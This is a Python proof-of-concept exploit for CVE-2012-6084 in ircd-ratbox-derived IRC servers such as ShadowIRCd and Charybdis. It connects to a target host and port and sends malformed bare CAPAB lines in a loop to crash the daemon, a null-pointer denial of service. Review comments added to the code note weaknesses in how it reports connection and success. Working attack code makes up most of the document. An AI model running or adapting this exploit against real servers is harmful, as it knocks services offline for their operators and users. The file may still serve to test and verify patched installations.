This exploit demonstrates a remotely triggerable crash in ircd-ratbox version 2.0. It affects Shadowircd version 6.3.3 and Charybdis version 3.4.2.
505feddc38f244f05e0a7faef634f09df484c9f17abd9e04dfc0e53aceb6f6ad
#!/usr/bin/python3
###################################################################################
#
# _ _ .__ .__
# __| || |_| | ____ ____ |__| ____ ____
# \ __ / | _/ __ \ / ___\| |/ _ \ / \
# | || || |_\ ___// /_/ > ( <_> ) | \ https://www.zempirians.com
# /_ ~~ _\____/\___ >___ /|__|\____/|___| /
# |_||_| \/_____/ \/
#
# 00100011 01101100 01100101 01100111 01101001 01101111 01101110
#
# Provided by: UberLame, Aph3x, Apetrick, O_O
#
###################################################################################
#
# -=[ SHADOWIRCD 6.3.3 - Running vulnerable m_capab.c ] =-
#
# [P]roof [o]f [C]oncept, Null Pointer Dereference, Denial of Service
#
#
###################################################################################
# -=[ EXPLOIT ]=-
#
# Now that a patch has been secured we are releasing a proof of concept to test your
# ircd against this vulnerability. This exploit was designed to work against
# Shadowircd 6.3.3 running the following vulnerable code:
#
# +VULNERABLE+
# ../shadowircd/modules/m_capab.c - LINE(40)
# {{mr_capab, 0}, mg_ignore, mg_ignore, mg_ignore, mg_ignore, mg_ignore}
#
# -=[ SUMMARY ]=-
#
# All versions of Charybdis are vulnerable to a remotely-triggered crash bug
# caused by code originating from ircd-ratbox 2.0. (Incidentally, this means all
# versions since ircd-ratbox 2.0 are also vulnerable.)
#
# The bug has to do with server capability negotiation. A malformed request will
# trigger a crash due to invalid assumptions.
#
# -=[ PATCH ]=-
#
# January 1, 2013 - 12:55 PM GMT-6
#
# Charybdis 3.4.2, ShadowIRCd 6.3.3 and Ratbox 3.0.8 have been released with an
# integrated patch to resolve this issue. All admins should upgrade immediately.
#
# -=[ REFERENCE ]=-
#
# https://www.cvedetails.com/cve/CVE-2012-6084/
#
###################################################################################
# Ohai, I Can Has Moar Cycles? <33
#
# Eg: ./<file>.py -t <target> -p <port>
###################################################################################
from argparse import ArgumentParser
import socket
def own( uri, port ):
    """Connect to an IRC daemon and repeatedly send a bare ``CAPAB`` line.

    Args:
        uri: hostname or address handed to ``socket.connect_ex``.
        port: port number; converted with ``int()`` before connecting.

    Returns nothing.  The send loop runs until ``sock.send`` raises
    ``socket.error`` (the peer has gone away), prints a message and
    closes the socket.  If the connect attempt raises, the process
    exits via ``exit()``.
    """
    sock = socket.socket()
    try:
        # NOTE(review): connect_ex() reports failure through its return
        # value (an errno), not an exception, so ``ret`` is assigned but
        # never inspected -- a refused connection still falls through to
        # the "Connected" message below.
        ret = sock.connect_ex(( uri, int( port ) ))
    except:
        # Bare except: also swallows a non-numeric ``port`` (ValueError
        # from int()) and KeyboardInterrupt, reporting both as a
        # connection failure.
        print( "\t[-] Failed To Connect To {}".format( uri ) )
        exit()
    print( "\t[+] Connected, Sending Payload To {}:{}".format( uri, port ) )
    while True:
        try:
            # The byte string decodes to "CAPAB \r\n": the CAPAB command
            # with an empty argument list.  There is no delay and no
            # iteration bound; the loop only ends when the send fails.
            sock.send(b"\x43\x41\x50\x41\x42\x20\x0d\x0a")
        except socket.error as se:
            # ``se`` is never used; any send failure (including the
            # server simply closing an unregistered connection) is
            # reported as success.  The patched releases listed in the
            # header are expected to reject the malformed request rather
            # than crash, so this message alone is not proof of impact.
            print( '\t[!] Owned <3' )
            break
    # Reached only via the ``break`` above; not run when exit() fired.
    sock.close()
if __name__ == '__main__':
    # Command-line entry point; usage example is in the header comment.
    parser = ArgumentParser( description='m_capab DOS PoC, We Can Has Moar Cycles?' )
    parser.add_argument( '-t', '--target', dest='target', default='localhost', help='IRCD Address To Target' )
    # The default is an int, but a value given on the command line arrives
    # as a str because no ``type=int`` is set; own() applies int() itself.
    parser.add_argument( '-p', '--port', dest='port', default=6667, help='IRCD Port To Target' )
    args = parser.parse_args()
    own( args.target, args.port )